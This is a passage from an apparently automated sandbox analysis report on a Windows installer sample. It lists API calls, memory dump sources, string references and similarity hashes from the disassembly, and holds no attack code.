                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                • GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                • String ID: nsa
                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                Strings
                                                                                                                • Error launching installer, xrefs: 00405748
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                • String ID: Error launching installer
                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 190613189-0
                                                                                                                • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9